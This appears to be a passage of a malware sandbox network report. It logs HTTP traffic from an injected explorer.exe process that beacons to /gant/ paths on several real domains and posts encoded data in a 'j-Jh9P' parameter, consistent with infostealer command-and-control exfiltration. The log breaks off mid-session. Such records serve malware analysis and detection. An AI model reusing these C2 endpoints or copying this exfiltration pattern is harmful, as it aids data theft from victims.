6f 50 4e 38 34 56 53 58 55 54 30 70 55 62 71 2d 6f 50 59 5a 61 64 47 69 69 48 56 74 35 73 28 41 45 69 41 4f 52 64 6e 43 50 48 34 65 51 4f 53 31 68 76 66 51 67 70 44 32 54 30 58 4d 55 36 73 42 47 4f 50 4d 56 42 45 73 6e 4c 75 79 36 59 6b 4a 71 53 37 4e 4a 52 6b 57 36 68 7a 52 28 42 39 4f 4b 43 52 72 6d 56 4f 65 35 64 42 71 52 5a 41 49 7e 4e 6b 68 43 41 75 79 35 43 4d 4d 72 5f 35 47 42 54 74 37 63 35 53 4a 6c 52 66 53 57 4b 61 31 47 74 41 58 48 2d 35 4d 4d 65 70 7a 4d 49 4d 71 61 75 58 4e 74 75 64 47 46 6e 59 73 68 65 4f 62 5a 36 4b 6a 56 70 67 73 69 4a 53 52 6e 55 5a 57 70 78 32 7a 43 32 39 41 35 46 70 53 45 52 6a 65 42 73 41 7a 56 4b 41 69 67 4e 6f 68 37 31 6a 5f 70 61 78 39 55 63 5a 35 45 4c 31 4b 67 6f 4c 67 38 77 72 2d 6d 52 32 74 32 2d 64 4e 6b 7a 49 33 37 33 70 5a 54 6e 74 49 35 73 28 79 62 6b 4d 36 75 66 75 4f 56 78 73 30 71 4b 43 4c 68 76 28 70 5a 76 4e 6e 5a 33 75 69 79 7a 6b 5f 78 4e 44 50 58 35 33 69 31 57 4c 43 54 62 32 33 68 53 67 43 48 33 4a 70 4e 2d 79 6f 34 69 45 5a 45 43 7e 4b 52 6d 37 75 46 52 6e 75 65 5a 70 48 71 31 41 6d 31 43 49 34 4c 2d 73 54 61 38 4e 6f 52 6b 4a 7a 4d 64 6f 57 50 43 32 6f 64 68 74 59 67 66 65 39 36 64 4d 65 6d 64 55 5f 52 45 57 51 4b 73 4c 55 44 55 54 4c 55 61 6b 63 75 5a 33 32 51 51 72 5f 33 4e 53 32 6a 72 38 48 46 70 67 50 6a 46 49 42 39 6c 65 6a 66 48 59 67 4f 66 62 31 4b 75 68 73 38 57 7e 2d 64 62 61 54 69 35 39 75 63 53 6c 55 38 4a 63 46 4c 2d 38 6a 78 37 47 59 72 73 42 54 78 57 7a 6a 4c 35 63 4f 41 44 28 76 35 69 38 59 45 30 73 63 59 47 75 59 39 68 35 6d 6c 55 4b 65 55 79 4e 32 6e 48 50 6d 52 49 47 31 52 6d 56 78 76 6c 4b 36 54 71 43 6d 67 4a 73 58 44 64 36 69 71 33 76 30 5a 44 64 36 79 6b 39 30 62 4e 4e 55 6c 34 50 43 6e 2d 4d 69 72 76 32 67 6f 56 41 64 35 4b 64 34 4f 62 7e 4c 75 65 75 48 48 6a 6e 49 35 76 37 69 6e 63 77 38 5a 6c 38 71 6e 5f 77 69 4d 63 34 66 34 79 6f 77 36 76 35 6e 4b 4a 55 4b 79 42 63 5f 59 43 59 47 69 57 61 39 30 32 4d 4a 64 6c 65 44 44 73 78 5a 28 6d 63 78 73 79 75 52 51 41 6c 49 34 42 53 39 57 72 69 54 6e 71 42 66 71 73 63 5a 61 41 6e 70 61 64 63 76 74 51 64 50 77 48 66 6d 44 5f 50 32 6d 7a 39 59 70 52 4f 6a 33 58 30 48 79 59 67 35 66 6a 66 6b 68 6b 67 6e 69 43 68 55 39 34 77 31 4d 38
                                                                                                                  Data Ascii: j-Jh9P=Kiq32EiG53tyQsqQ1jqKvFzbDManuKfkEXvrCYN3qNLEzHiUviRemORwF1TnAI70ddEDq4ypUHdRMipxBaBfL7EMKd(KFjfKIeRhGyo-TcIoobDEWd4SqXvDQBizIXlppqSafRlReTLYKIZXZ8UIugIyo3vuz2K2wztIhjun0CCZmQfAyBk8mWnCbFgO9R(dMskAy04H~d3GHBZ1YzpmV4umghPcM5KAEKk0aWD-Sh20pb5yJwJHLvEI9gEqRNLrm5qW(-hDdYtRhhExVfBkqID_zihQUZevHLvsft2VqUWNJMGmOwgkxjWwDiwyxbA4(ASelGV2Mv0DKNdvBNTQy3o4WMLPLYKTAg7mTXPxj5LtC7ap1yrOrR0u~XEHGiMu6-qM5AxLMJWdfCHb~HQ5FtZwRVr9dJp1ydSQzddFTVIc6J9CfShurObB4me6yaBXeiigfGG5ZSzrPtkdFZZ-O_rbfx3H47sd2W7H01OCxCe2oeOemfUTkGQnMAhNtO79Xc0T6RxyEkTSlo~0uqGVv0gXZWJkoOlZapDki5ZUv948iJOXFZuuGbBZMHOtbsmdhYtm~0pDVlTrrQj8h9(it44tgWSwsxup5tIm1YjZHOinjdjxhloPN84VSXUT0pUbq-oPYZadGiiHVt5s(AEiAORdnCPH4eQOS1hvfQgpD2T0XMU6sBGOPMVBEsnLuy6YkJqS7NJRkW6hzR(B9OKCRrmVOe5dBqRZAI~NkhCAuy5CMMr_5GBTt7c5SJlRfSWKa1GtAXH-5MMepzMIMqauXNtudGFnYsheObZ6KjVpgsiJSRnUZWpx2zC29A5FpSERjeBsAzVKAigNoh71j_pax9UcZ5EL1KgoLg8wr-mR2t2-dNkzI373pZTntI5s(ybkM6ufuOVxs0qKCLhv(pZvNnZ3uiyzk_xNDPX53i1WLCTb23hSgCH3JpN-yo4iEZEC~KRm7uFRnueZpHq1Am1CI4L-sTa8NoRkJzMdoWPC2odhtYgfe96dMemdU_REWQKsLUDUTLUakcuZ32QQr_3NS2jr8HFpgPjFIB9lejfHYgOfb1Kuhs8W~-dbaTi59ucSlU8JcFL-8jx7GYrsBTxWzjL5cOAD(v5i8YE0scYGuY9h5mlUKeUyN2nHPmRIG1RmVxvlK6TqCmgJsXDd6iq3v0ZDd6yk90bNNUl4PCn-Mirv2goVAd5Kd4Ob~LueuHHjnI5v7incw8Zl8qn_wiMc4f4yow6v5nKJUKyBc_YCYGiWa902MJdleDDsxZ(mcxsyuRQAlI4BS9WriTnqBfqscZaAnpadcvtQdPwHfmD_P2mz9YpROj3X0HyYg5fjfkhkgniChU94w1M8UJYxFilVtBWmckE8NAW_xnzrf3R36bt0tu3Bqm1jqm5D8LO_O3S_UvwGXlAEEJ1z(1L08ufT7ezk6xzw5sQW(jJrs2Pll7vhZywMkVvOsodf6VWKg2fm1VLmLuxYiaPPr-Vpc_ylpt8nnN1UMtDlg1ojhIGQDYFivpCjrvmNQsNswudHQa7Sw32drEY1X73RtyTx4qe06AzkDmSDoLgurnWc~pZXZbVDsCRO33pERn0nzvG-FriS4KO9X2dExErB2a8jE-O4GdpcVHcphGi3zqqH6L6BHua4J7JiYqhAxvH9Lxdr~shUggmMxGFgVPJDr9~r81hX02lUhm7Ww0h4gsDalM57hmV0PQyaBochRSDQFZqBldlsN-J0fL8r(gdXjdY4WAN1D984JpYwJqSBybCLuWFK7YC9KxJFgUhJqKAcGokF8EfNl-YcY9pD1yTLJzUEo1yPZXO7W0Afav~RNzIli8wE9DdaLi3sTSNy1blkR9TJp7IHDBtazNHzawteVjwzFuiLRaCc0p3NzKjn8Y4hTzzxawDUSO7H5K7o2HHBULT7DoNIjQbMpjX2mqZWxdhpHH4WfVXDxFnmNHtZbHpl1Q04nO3r4rsdxJsbOMLLhrOL7mLVjge1Q8JsTRK3e4cKfrYhmROftzKe1LWcuhGAwa(ae2h2hlC4hIHxHgBk9ZJe5eW8mK2LkeDP7nDUrp9OIkW-afAbOhJk6d(yPbFreRvBnVZim3XBj_1MG9oBYLuLhu~BigkfLXJijBFzVcdyzmGFhElHPkn1v4C6tKlS(0AKk7sY~-rT(2LxXC9vT_8I3X0GQgruK4sNTwZF5s5AdUm62CEiRy(AesPObqpgMnMp64vHuACa0vlY0GCIsi3uzCIyrwtwYmm7AnQ3LgD51gakNpsXpeP_BhRnSeSZv9~Y7j8Ef3qYdxpo~IeO~juVG1jfLBt9FGHke2pmFxxBjY4lCvEomBLJC5zc2U3dFw62hQHblC9wjL6NfvX5rKfZR_C71InKoFcP0jUvhVoDglVNyRxAHZ44~BWRJR~wFRDlYafdMOR7u4ozAsAQn-aD0wjC8Dy7AHXCVZbpbHYt505T~KKpzFCRlxkhy0GULvrsoQfiWr~LqsZ9Q9thlGmrBvgPYfJuVJzOFOgBwDk8pqNEFZe4eitr88iTqvivhnaoawu8ct3al3yk8UxImOvAQ-CzC9NcskWl(c1_RyotWuxKR-XlxRJVdEBtt5(AThKCd4RJi78do4AeI3n4i0g363XuCgSFuXZVtLiGwCpUUmaTStyMo_F4TL979illasj3~Y8PxaNaGiy9AzMnkYoW2nLS(CYmN6Uini9fYhwglvgXT2FZBA3-lJ091C~OWaC_QTY7fo~4eQB4YlhnsT81EcKH1mi6thG9uNINviycrudA(LQRH29vsD9BG2HGFV4wjrl-F6TzlypZnp3Ul26BLS5bEJSs7wKWp6CF(KhnnpHlSnkKuYuFc0Mdi1Xjn77vnzQTVUV245Nb83hjBe9oK8jFSLSN~GLpHIu5~8~R5l2ZGvlJkIlaqWSEtw507R50EpNHQ0BBqMNstN58GVwAAYAJ5oH_XHB2BM6Kb10a38sbTYAJo7gmII09CO8hIjF3OfK-Ro7mcRo7xVlPBw5y50lqWoDKnzagUTrDxminHLe9alQW7RdZWMNxt3vNWEHLXIEpv1R-ieg1d-HPE2eG1a8zd0XnN1usY_3JhWPdxELcq7xEvR2jFO(HpIaqO93GQxMvQXzNJP6gsyNIFhS0th2M2xWG41FZuhUiINUQ4xvFtBfNvu4WaTTs9bcFzPW9U60r1wkbWCn_yEWjJ5g_YgZRUMea8L04ATcfx2gM4X(ksZClpnZSPWrc0KtjgNhXG51D
                                                                                                                  Feb 13, 2023 19:01:48.507941008 CET913OUTData Raw: 43 68 6c 4a 4c 58 75 73 54 51 66 6d 4d 6c 6f 35 67 76 71 34 4c 6a 6c 4b 66 46 4a 48 61 65 66 54 35 54 68 4d 7a 47 49 4b 6b 79 47 79 54 71 77 64 34 76 70 33 30 70 72 77 6a 4a 38 77 54 4a 4f 30 37 72 62 31 77 70 6a 69 68 69 35 77 64 39 6f 5f 33 58
                                                                                                                  Data Ascii: ChlJLXusTQfmMlo5gvq4LjlKfFJHaefT5ThMzGIKkyGyTqwd4vp30prwjJ8wTJO07rb1wpjihi5wd9o_3XlTjZJTcTKqUwjAyVZtPvu2pvz4uuYCaH~c0lszkgMaStmclOTjROmmJFlqGbKkFUpxZ866Alpe7rYHQwIQBkphsaQmatT9kmphelqxisvP8bS9SEuR3unIwcz-thqUNCNnrKunpeFzUrxLawYv1QFgAQrb0WYX(-(


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  3192.168.11.2049842217.160.0.3780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:00:00.155975103 CET444OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.grenoble-informatique.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.grenoble-informatique.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.grenoble-informatique.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 37 4c 6a 58 42 39 4a 61 38 36 65 70 4f 51 39 69 31 73 30 61 43 5f 55 4b 71 55 43 37 4d 35 67 6a 52 70 36 6b 28 7a 4f 42 47 51 45 61 6d 56 67 49 75 67 44 69 69 74 56 4c 58 30 52 73 63 35 6f 4e 47 72 31 2d 6d 65 72 44 63 4d 32 6a 34 59 39 64 4e 66 49 73 31 2d 70 5f 31 32 56 67 58 50 4a 77 44 48 4d 32 6c 35 35 46 64 59 32 42 54 75 4f 6c 28 49 4a 56 67 74 74 79 53 2d 65 4e 6b 77 59 4c 4d 65 36 6c 31 51 6d 4a 4e 33 62 57 39 61 6c 74 62 6b 54 76 37 6e 39 4d 66 4b 6c 50 6c 6f 6f 4e 62 64 38 49 66 70 46 74 6f 66 35 77 49 36 67 6e 73 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=7LjXB9Ja86epOQ9i1s0aC_UKqUC7M5gjRp6k(zOBGQEamVgIugDiitVLX0Rsc5oNGr1-merDcM2j4Y9dNfIs1-p_12VgXPJwDHM2l55FdY2BTuOl(IJVgttyS-eNkwYLMe6l1QmJN3bW9altbkTv7n9MfKlPlooNbd8IfpFtof5wI6gnsA).
                                                                                                                  Feb 13, 2023 19:00:00.174130917 CET445INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Date: Mon, 13 Feb 2023 18:00:00 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  30192.168.11.2049875208.91.197.9180C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:01:51.132484913 CET921OUTGET /gant/?j-Jh9P=HgCX1yPl02YVZ8ntsD2Fu2rJboCHorDOJXbMMq44vtOckm/otWVg58UmWCLCWofbQIl3m/yqZE5fIEBzZKMECrgvXJ6dLgzQIQ==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.brothersbears.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:01:51.319227934 CET922INHTTP/1.1 200 OK
                                                                                                                  Date: Mon, 13 Feb 2023 18:01:51 GMT
                                                                                                                  Server: Apache
                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                  Set-Cookie: vsid=919vr4238569113044600; expires=Sat, 12-Feb-2028 18:01:51 GMT; Max-Age=157680000; path=/; domain=www.brothersbears.com; HttpOnly
                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_iDiNqDRk1B0Pw2PrFe49wqrYCBDF7BUJ2T8P2B+zvBF4PBponSGobld3ba4e9F2goesqM5Vvs3Z522jY/grC+A==
                                                                                                                  Content-Length: 2807
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Connection: close
                                                                                                                  Feb 13, 2023 19:01:51.319308996 CET922INData Raw: 3c 21 2d 2d 0d 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 72 6f 74 68 65 72 73 62 65 61 72 73 2e 63 6f 6d 2f 3f 66 70 3d 42 30 49 4e 59 38 73 6e 6c 38 6d 77 25 32 42 63 41 4a 48 37 32 6e 55 7a 59 56 43 61
                                                                                                                  Data Ascii: ...top.location="http://www.brothersbears.com/?fp=B0INY8snl8mw%2BcAJH72nUzYVCaUxbDaGdZbUB3wx2UlG%2BELJV8E7p0rxWg6dgbH6JB62sSqCxekc5lhbwkRr5RyU067geHm6%2BlDJGaH5iOXw9hyQk%2BcpQIN5numlySJjvTa
                                                                                                                  Feb 13, 2023 19:01:51.319375992 CET923INData Raw: 63 59 62 57 32 50 79 77 6d 79 64 42 33 32 4a 39 46 62 46 37 4e 4b 52 63 47 33 44 56 70 43 64 58 62 69 6c 38 79 49 30 4d 25 33 44 26 70 72 76 74 6f 66 3d 58 51 74 25 32 42 6e 34 66 5a 69 46 63 55 61 31 7a 72 30 36 45 78 44 25 32 42 37 70 59 30 31
                                                                                                                  Data Ascii: cYbW2PywmydB32J9FbF7NKRcG3DVpCdXbil8yI0M%3D&prvtof=XQt%2Bn4fZiFcUa1zr06ExD%2B7pY01ccL7XFCOEnBOagPU%3D&poru=e6H8rpm5oDXseJ0jx6JhvRy4Hza4DJW%2F5Mt2EMJm62ucrnXLJZsjX%2Buo54x2nGvhc9H0exkdw3KX7C1tkTchgwldvf%2BiKaBJg7wFok5uhzW%2F2LC6NobRjfcSrmF8UgEl
                                                                                                                  Feb 13, 2023 19:01:51.319442987 CET924INData Raw: 55 42 33 77 78 32 55 6c 47 25 32 42 45 4c 4a 56 38 45 37 70 30 72 78 57 67 36 64 67 62 48 36 4a 42 36 32 73 53 71 43 78 65 6b 63 35 6c 68 62 77 6b 52 72 35 52 79 55 30 36 37 67 65 48 6d 36 25 32 42 6c 44 4a 47 61 48 35 69 4f 58 77 39 68 79 51 6b
                                                                                                                  Data Ascii: UB3wx2UlG%2BELJV8E7p0rxWg6dgbH6JB62sSqCxekc5lhbwkRr5RyU067geHm6%2BlDJGaH5iOXw9hyQk%2BcpQIN5numlySJjvTacYbW2PywmydB32J9FbF7NKRcG3DVpCdXbil8yI0M%3D&prvtof=4he1YkwBh4d2LBk38vbEPP4OCM4xGip03WwAAi4t4sk%3D&poru=mEN9pp5MwunUTPUHxR7kgH3aowZLcIe5wNixaU
                                                                                                                  Feb 13, 2023 19:01:51.319500923 CET925INData Raw: 46 75 32 72 4a 62 6f 43 48 6f 72 44 4f 4a 58 62 4d 4d 71 34 34 76 74 4f 63 6b 6d 25 32 46 6f 74 57 56 67 35 38 55 6d 57 43 4c 43 57 6f 66 62 51 49 6c 33 6d 25 32 46 79 71 5a 45 35 66 49 45 42 7a 5a 4b 4d 45 43 72 67 76 58 4a 36 64 4c 67 7a 51 49
                                                                                                                  Data Ascii: Fu2rJboCHorDOJXbMMq44vtOckm%2FotWVg58UmWCLCWofbQIl3m%2FyqZE5fIEBzZKMECrgvXJ6dLgzQIQ%3D%3D&T9=bPxTYTKdI2">Click here to proceed</a>.</body></noframes></html>...*/-->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  31192.168.11.2049876192.154.231.17480C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:01:56.514149904 CET926OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.sciencevale.xyz
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.sciencevale.xyz
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.sciencevale.xyz/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 35 76 66 35 73 46 6f 69 69 6b 51 70 49 63 38 47 70 7a 4d 71 4f 48 56 34 46 65 56 43 48 4a 4c 41 7a 36 50 6b 50 61 57 51 53 61 36 57 46 74 37 6c 32 4b 66 4d 59 38 79 57 69 41 70 6c 58 57 6b 73 72 44 36 57 65 4b 54 6e 72 6f 79 6a 47 76 41 57 50 44 4b 65 52 41 6a 56 4c 34 59 5f 6a 61 77 4a 30 4b 4e 57 78 65 6c 41 67 6e 47 7a 36 37 56 36 4e 66 38 41 63 43 30 49 38 41 6e 66 78 61 46 74 67 73 65 4a 34 7a 78 45 48 39 54 73 6b 4d 75 31 55 53 64 62 65 39 4a 75 56 49 4d 35 6c 6f 4f 71 61 54 38 31 5a 58 48 78 47 58 44 41 4b 6f 43 56 65 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=5vf5sFoiikQpIc8GpzMqOHV4FeVCHJLAz6PkPaWQSa6WFt7l2KfMY8yWiAplXWksrD6WeKTnroyjGvAWPDKeRAjVL4Y_jawJ0KNWxelAgnGz67V6Nf8AcC0I8AnfxaFtgseJ4zxEH9TskMu1USdbe9JuVIM5loOqaT81ZXHxGXDAKoCVeA).


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  32192.168.11.2049877192.154.231.17480C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:01:59.197256088 CET927OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.sciencevale.xyz
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.sciencevale.xyz
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.sciencevale.xyz/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 35 76 66 35 73 46 6f 69 69 6b 51 70 4b 38 4d 47 73 51 55 71 4d 6e 56 37 5a 75 56 43 65 5a 4b 48 7a 36 7a 6b 50 62 53 41 53 6f 65 57 4c 76 54 6c 6b 50 28 4d 56 63 79 57 6f 67 70 61 54 57 6b 37 72 43 47 30 65 4f 62 6e 72 6f 6d 6a 48 63 34 57 59 44 4b 64 65 67 6a 55 4d 34 59 36 6e 61 77 44 30 4e 46 73 78 61 31 41 67 58 61 7a 37 39 4a 36 4a 4f 38 48 57 79 30 4f 33 67 6e 51 7e 36 46 72 67 73 53 33 34 32 64 55 45 4c 7a 73 6c 73 4f 31 56 53 64 59 51 4e 4a 31 49 59 4e 63 6a 49 71 6e 64 42 39 4f 4d 6e 6e 55 42 44 32 50 47 4c 7a 4e 63 36 6a 76 6a 39 41 50 65 46 55 6f 64 43 4d 64 57 49 43 36 46 52 35 55 28 71 61 71 65 69 4c 31 69 44 6a 64 52 5a 69 6e 56 76 67 76 6a 48 4e 6b 74 69 63 5a 6c 47 42 79 73 6e 56 5f 41 5f 50 58 6b 36 5a 59 73 37 34 30 57 42 52 4d 4f 67 45 4c 74 76 43 70 71 6b 37 49 55 45 33 48 61 38 31 62 67 4c 74 6e 58 36 46 36 35 52 65 71 31 65 70 64 4c 71 61 52 70 72 6c 5a 74 6b 31 63 69 31 76 4b 71 79 70 55 75 59 75 52 4d 54 56 4b 74 52 71 62 4f 45 47 2d 77 69 4b 42 51 6e 6a 5f 4c 48 32 34 48 73 43 49 7e 6e 6e 4a 53 37 47 76 52 30 62 53 58 39 58 48 4a 36 74 54 33 53 28 4f 58 50 65 6f 37 6b 30 55 4f 4b 53 41 4b 6a 48 75 4d 31 58 43 46 35 6d 4e 55 61 79 62 4a 59 78 4a 62 59 34 41 47 67 79 58 33 34 71 4a 72 43 68 70 30 57 51 64 58 6b 36 33 74 4f 54 43 38 45 79 71 70 59 66 63 48 6a 42 71 74 6b 67 66 62 4c 73 50 7a 72 46 7a 44 69 6d 37 49 5a 51 72 63 67 45 6e 41 45 56 34 47 33 73 48 67 43 69 78 48 68 62 47 4b 32 41 4a 51 44 7a 4f 37 30 42 47 4e 54 4b 49 51 32 71 4f 69 2d 39 42 38 66 71 4c 37 6c 71 62 63 41 64 7a 72 5f 44 56 38 42 34 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=5vf5sFoiikQpK8MGsQUqMnV7ZuVCeZKHz6zkPbSASoeWLvTlkP(MVcyWogpaTWk7rCG0eObnromjHc4WYDKdegjUM4Y6nawD0NFsxa1AgXaz79J6JO8HWy0O3gnQ~6FrgsS342dUELzslsO1VSdYQNJ1IYNcjIqndB9OMnnUBD2PGLzNc6jvj9APeFUodCMdWIC6FR5U(qaqeiL1iDjdRZinVvgvjHNkticZlGBysnV_A_PXk6ZYs740WBRMOgELtvCpqk7IUE3Ha81bgLtnX6F65Req1epdLqaRprlZtk1ci1vKqypUuYuRMTVKtRqbOEG-wiKBQnj_LH24HsCI~nnJS7GvR0bSX9XHJ6tT3S(OXPeo7k0UOKSAKjHuM1XCF5mNUaybJYxJbY4AGgyX34qJrChp0WQdXk63tOTC8EyqpYfcHjBqtkgfbLsPzrFzDim7IZQrcgEnAEV4G3sHgCixHhbGK2AJQDzO70BGNTKIQ2qOi-9B8fqL7lqbcAdzr_DV8B4.


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  33192.168.11.2049878192.154.231.17480C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:02:01.897257090 CET930OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.sciencevale.xyz
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.sciencevale.xyz
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.sciencevale.xyz/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
